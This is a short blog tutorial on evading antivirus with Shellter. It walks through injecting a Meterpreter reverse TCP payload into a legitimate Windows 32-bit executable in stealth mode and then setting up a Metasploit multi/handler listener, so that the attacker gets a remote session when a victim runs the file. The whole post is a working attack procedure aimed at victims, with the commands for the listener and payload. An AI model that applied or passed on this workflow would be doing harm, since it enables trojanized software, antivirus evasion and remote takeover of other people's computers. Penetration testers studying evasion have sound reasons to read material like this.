Thursday, July 27, 2017
Evading Anti-Virus Detection with Shellter
Anti virus softwares are the last and only defense against malwares in most of the personal computers. So getting through them or evading them is one of the most important thing in penetrating such systems. Payload encoding is one of the method used by attackers to evade detection. You can use metasploit built-in encoders to encode your payloads, but most of the anti virus solutions will detect these payloads. So we need alternatives to evade the detection. Shellter is one of the available solution.
Shellter is able to re-encode windows 32 bit application packages after including the payload or the shell codes so that anti virus softwares will not be able to detect it.
Shellter is not built into Kali Linux, so you have to install it manually. You can either download Shellter from here or use the command apt-get install shellter
Shellter is an .exe file so you need to download wine to run it on Kali Linux if you don't have it already installed.
After you are done with the installations. select windows 32 bit application you need to add the payload and start the shellter.
Then Shellter will start in another window
Choose operation mode as A then provide the location of the windows application. if you are currently in the same directory as the windows application just giving the name would be enough, else you will have to provide the absolute path
Then Shellter will take a copy of the original .exe file and start the process. and it will prompt you for the stealth mode option select Y
Then it will display a list of native payloads available, You can either choose from the available list or one of your own payload to encode. For this example I will use the Meterpreter_reverse_tcp payload from the list. To use a payload from the list press L and then select the payload index
When it prompt for LHOST, provide the ip address of your Kali Linux machine and then provide a port number. remember the port number because you will need it when you are setting up the listener.
If everything was successful you will get the following message
Now you need to set up a listener to catch incoming connection from the payload.
Start metasploit to setup a listener using msfconsole command.
select the listener using
use exploit/multi/handler
then select the payload using
set payload windows/meterpreter_reverse_tcp
the payload should be the same as the payload you set in the sheller.
then set LHOST and LPORT with same values you set in the shellter and then execute
Whenever your victim execute the exe with the payload you will get a meterpreter session.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment